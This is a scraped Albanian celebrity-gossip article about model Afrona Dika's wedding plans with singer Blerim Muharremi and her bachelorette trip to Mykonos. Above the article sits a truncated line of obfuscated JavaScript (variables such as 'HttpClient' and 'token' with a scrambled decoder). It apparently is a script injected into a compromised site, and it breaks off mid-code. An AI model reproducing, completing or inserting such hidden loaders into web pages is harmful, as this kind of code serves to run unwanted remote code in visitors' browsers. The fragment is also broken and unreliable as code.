;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Po martohet dhe ja ku do e bëje festën e çmendur të beqarisë Afrona Dika

By

Vitin e ardhshëm ajo do niset drejt altarit me bashkëshortin e saj, këngëtarin Blerim Muharremi.

Pas më shumë se dy vjet të fejuar, dyshja do të lidhin më në fund kurorë në shtator të vitit të ardhshëm.

Siç ka zbuluar Prive muaj më parë, dyshja do të martohen me dasmë të madhe e sigurisht aty do ketë një numër të madh të ftuarish VIP.

E derisa dasma do edhe një vit që të zhvillohet, Afrona Dika ka zgjedhur që gjërat t’i kryejë sa më parë. Modelja ka nisur edhe provat e para për vellon që do ta veshë dhe këtë e ka zbuluar në profilin e saj në Instagram.

Megjithatë, ajo nuk ka zbuluar detaje se si po duket si nuse e çfarë modelesh të fustaneve po provon këto ditë.

Por një tjetër detaj e ka thënë!

Festën e beqarisë nuk do e ketë kanagjeq tipik e tradicional shqiptar. Afrona ka preferuar të jetë më perëndimore në këtë aspekt, duke vendosur të shkojë në ishullin Mykonos të Greqisë për t’i festuar ditët e fundit si beqareshë para se të niset në altar me të fejuarin e saj prej vitesh.

Artikuj të ngjashëm